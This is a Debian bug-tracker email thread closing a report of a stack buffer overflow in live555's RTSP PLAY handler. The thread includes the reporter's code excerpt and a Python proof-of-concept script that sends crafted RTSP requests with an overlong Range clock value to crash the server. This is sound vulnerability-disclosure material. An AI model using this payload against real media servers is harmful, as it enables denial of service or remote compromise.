Bug#964552: marked as done ([Security Issue][liblivemedia] stack buffer overflow in liblivemedia)

To: Sebastian Ramacher <sramacher@debian.org>

Subject: Bug#964552: marked as done ([Security Issue][liblivemedia] stack buffer overflow in liblivemedia)

From: "Debian Bug Tracking System" <owner@bugs.debian.org>

Date: Fri, 10 Jul 2020 08:57:07 +0000

Message-id: <[🔎] handler.964552.D964552.159437128522614.ackdone@bugs.debian.org>

References: <20200710085436.GB12911@ramacher.at> <CAPPWy6GmayR9553bsCk2n0818duypbf=uG7bhyX=onmppoKK5A@mail.gmail.com>

Your message dated Fri, 10 Jul 2020 10:54:36 +0200 with message-id <20200710085436.GB12911@ramacher.at> and subject line Re: Bug#964552: [Security Issue][liblivemedia] stack buffer overflow in liblivemedia has caused the Debian Bug report #964552, regarding [Security Issue][liblivemedia] stack buffer overflow in liblivemedia to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact owner@bugs.debian.org immediately.) -- 964552: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=964552 Debian Bug Tracking System Contact owner@bugs.debian.org with problems

--- Begin Message ---

To: submit@bugs.debian.org
Subject: [Security Issue][liblivemedia] stack buffer overflow in liblivemedia
From: Xiaobo Xiang <xiangxiaobo1994@gmail.com>
Date: Wed, 8 Jul 2020 23:21:30 +0800
Message-id: <CAPPWy6GmayR9553bsCk2n0818duypbf=uG7bhyX=onmppoKK5A@mail.gmail.com>

Package: liblivemedia
Version: 06.25

[summary]
In the latest version of live555 mediaserver, there is a stack based buffer overflow vulnerability when parsing 'PLAY' command.

An attacker is able to send a sequence of malformed RTSP packets to trigger this issue. In the worst case, the media server running this service can be exploited remotely without user interaction.

[bug details]
The bug is in function RTSPServer::RTSPClientSession::handleCmd_PLAY().
It calls a sscanf function to get absolute start time and end time as strings. This is an unsafe c function that should be taken good care of.
```cpp
} else if (sscanf(paramStr, "clock = %n", &numCharsMatched3) == 0 && numCharsMatched3 > 0) {
rangeStart = rangeEnd = 0.0;

char const* utcTimes = &paramStr[numCharsMatched3];
size_t len = strlen(utcTimes) + 1;
char* as = new char[len];
char* ae = new char[len];
int sscanfResult = sscanf(utcTimes, "%[^-]-%[^\r\n]", as, ae); /// <=== dangerous function call
if (sscanfResult == 2) {
absStartTime = as;
absEndTime = ae;
} else if (sscanfResult == 1) {
```

The absStartTime and absEndTime will then be filled into a buffer in the stack whose size is 100. While the absStart and absEnd are controllable by us, so it is possible to overflow the buffer in the stack.
```cpp
char buf[100];
......
if (absStart != NULL)
{
// We're seeking by 'absolute' time:
if (absEnd == NULL)
{
sprintf(buf, "Range: clock=%s-\r\n", absStart);
}
else
{
sprintf(buf, "Range: clock=%s-%s\r\n", absStart, absEnd);
}
delete[] absStart;
delete[] absEnd;
}
'''

[proof of concept]
I've attached a python script to trigger this issue.

```python
import socket
import sys,time

s = socket.socket()
s.connect(("127.0.0.1",8554))

payload = 'OPTIONS rtsp://localhost:8554/small.ogv RTSP/1.0\r\n'
payload += 'CSeq: 2\r\n'
payload += 'User-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media v2019.05.29)\r\n\r\n'
s.send(payload)

time.sleep(0.1)
data = "">print(data)

payload = 'DESCRIBE rtsp://localhost:8554/small.ogv RTSP/1.0 \r\nCSeq: 3 \r\nUser-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media v2019.05.29) \r\nAccep
t: application/sdp\r\n\r\n'

s.send(payload)
time.sleep(0.1)
print(s.recv(0x10000))

payload = 'SETUP rtsp://127.0.0.1:8554/small.ogv/track1 RTSP/1.0\r\nCSeq: 4\r\nUser-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media v2019.05.29)\r\nTra$sport: RTP/AVP;unicast;client_port=53642-53643\r\n\r\n'
s.send(payload)
time.sleep(0.1)
res = s.recv(0x10000)
print(res)

payload = 'PLAY rtsp://127.0.0.1:8554/small.ogv/track1 RTSP/1.0\r\nCSeq: 7\r\nUser-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media v2019.05.29)\r\nSession: %s\r\n\r\nRange: clock = 0.00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000-0.01\r\n\r\n' % sessionId
s.send(payload)
time.sleep(0.1)
print(s.recv(0x10000))

while True:
pass
```

Best Regards,
Xiaobo Xiang

--- End Message ---

--- Begin Message ---

To: Xiaobo Xiang <xiangxiaobo1994@gmail.com>, 964552-done@bugs.debian.org
Subject: Re: Bug#964552: [Security Issue][liblivemedia] stack buffer overflow in liblivemedia
From: Sebastian Ramacher <sramacher@debian.org>
Date: Fri, 10 Jul 2020 10:54:36 +0200
Message-id: <20200710085436.GB12911@ramacher.at>
In-reply-to: <CAPPWy6Hu9WqxNH89Ks=OBtMTFWRxvNDnk97E+HSwU1v=R8dpAA@mail.gmail.com>
References: <CAPPWy6GmayR9553bsCk2n0818duypbf=uG7bhyX=onmppoKK5A@mail.gmail.com> <[🔎] 20200708185337.GA1507935@ramacher.at> <CAPPWy6Hu9WqxNH89Ks=OBtMTFWRxvNDnk97E+HSwU1v=R8dpAA@mail.gmail.com>

Hi

On 2020-07-09 12:13:49, Xiaobo Xiang wrote:
> Hello,
> 
> The affected version is the latest upstream version, I've just reported it
> upstream via their official maillist. Thanks for reminding me.

Thanks! I am closing the Debian bug report as this affects a version
that is not yet available in Debian.

Cheers

> 
> Thanks,
> Xiaobo Xiang
> 
> Sebastian Ramacher <sramacher@debian.org> 于2020年7月9日周四 上午2:53写道：
> 
> > Control: tags -1 + moreinfo
> >
> > Hi
> >
> > On 2020-07-08 23:21:30 +0800, Xiaobo Xiang wrote:
> > > Package: liblivemedia
> > > Version: 06.25
> > >
> > > [summary]
> > > In the latest version of live555 mediaserver, there is a stack based
> > buffer
> > > overflow vulnerability when parsing 'PLAY' command.
> >
> > Which version do you mean? The current version in Debian is 2020.01.19.
> > The latest upstream version is 2020.06.25. Do you mean the latter? Have
> > you reported this issue upstream? See http://www.live555.com/liveMedia/
> > for ways to contact the upstream developer.
> >
> > Cheers
> >
> > >
> > > An attacker is able to send a sequence of malformed RTSP packets to
> > trigger
> > > this issue. In the worst case, the media server running this service can
> > be
> > > exploited remotely without user interaction.
> > >
> > > [bug details]
> > > The bug is in function RTSPServer::RTSPClientSession::handleCmd_PLAY().
> > > It calls a sscanf function to get absolute start time and end time as
> > > strings. This is an unsafe c function that should be taken good care of.
> > > ```cpp
> > >   } else if (sscanf(paramStr, "clock = %n", &numCharsMatched3) == 0 &&
> > > numCharsMatched3 > 0) {
> > >     rangeStart = rangeEnd = 0.0;
> > >
> > >     char const* utcTimes = &paramStr[numCharsMatched3];
> > >     size_t len = strlen(utcTimes) + 1;
> > >     char* as = new char[len];
> > >     char* ae = new char[len];
> > >     int sscanfResult = sscanf(utcTimes, "%[^-]-%[^\r\n]", as, ae);   ///
> > > <=== dangerous function call
> > >     if (sscanfResult == 2) {
> > >       absStartTime = as;
> > >       absEndTime = ae;
> > >     } else if (sscanfResult == 1) {
> > > ```
> > >
> > > The absStartTime and absEndTime will then be filled into a buffer in the
> > > stack whose size is 100. While the absStart and absEnd are controllable
> > by
> > > us, so it is possible to overflow the buffer in the stack.
> > > ```cpp
> > >   char buf[100];
> > >   ......
> > >   if (absStart != NULL)
> > >   {
> > >     // We're seeking by 'absolute' time:
> > >     if (absEnd == NULL)
> > >     {
> > >       sprintf(buf, "Range: clock=%s-\r\n", absStart);
> > >     }
> > >     else
> > >     {
> > >       sprintf(buf, "Range: clock=%s-%s\r\n", absStart, absEnd);
> > >     }
> > >     delete[] absStart;
> > >     delete[] absEnd;
> > >   }
> > > '''
> > >
> > > [proof of concept]
> > > I've attached a python script to trigger this issue.
> > >
> > > ```python
> > > import socket
> > > import sys,time
> > >
> > > s = socket.socket()
> > > s.connect(("127.0.0.1",8554))
> > >
> > > payload = 'OPTIONS rtsp://localhost:8554/small.ogv RTSP/1.0\r\n'
> > > payload += 'CSeq: 2\r\n'
> > > payload += 'User-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media
> > > v2019.05.29)\r\n\r\n'
> > > s.send(payload)
> > >
> > > time.sleep(0.1)
> > > data = s.recv(0x10000)
> > > print(data)
> > >
> > > payload = 'DESCRIBE rtsp://localhost:8554/small.ogv RTSP/1.0 \r\nCSeq: 3
> > > \r\nUser-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media
> > v2019.05.29)
> > > \r\nAccep
> > > t: application/sdp\r\n\r\n'
> > >
> > > s.send(payload)
> > > time.sleep(0.1)
> > > print(s.recv(0x10000))
> > >
> > > payload = 'SETUP rtsp://127.0.0.1:8554/small.ogv/track1
> > RTSP/1.0\r\nCSeq:
> > > 4\r\nUser-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media
> > > v2019.05.29)\r\nTra$sport:
> > RTP/AVP;unicast;client_port=53642-53643\r\n\r\n'
> > > s.send(payload)
> > > time.sleep(0.1)
> > > res = s.recv(0x10000)
> > > print(res)
> > >
> > > payload = 'PLAY rtsp://127.0.0.1:8554/small.ogv/track1 RTSP/1.0\r\nCSeq:
> > > 7\r\nUser-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media
> > > v2019.05.29)\r\nSession: %s\r\n\r\nRange: clock =
> > >
> > 0.00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000-0.01\r\n\r\n'
> > > % sessionId
> > > s.send(payload)
> > > time.sleep(0.1)
> > > print(s.recv(0x10000))
> > >
> > > while True:
> > >     pass
> > > ```
> > >
> > > Best Regards,
> > > Xiaobo Xiang
> >
> > --
> > Sebastian Ramacher
> >

-- 
Sebastian Ramacher

--- End Message ---

Reply to: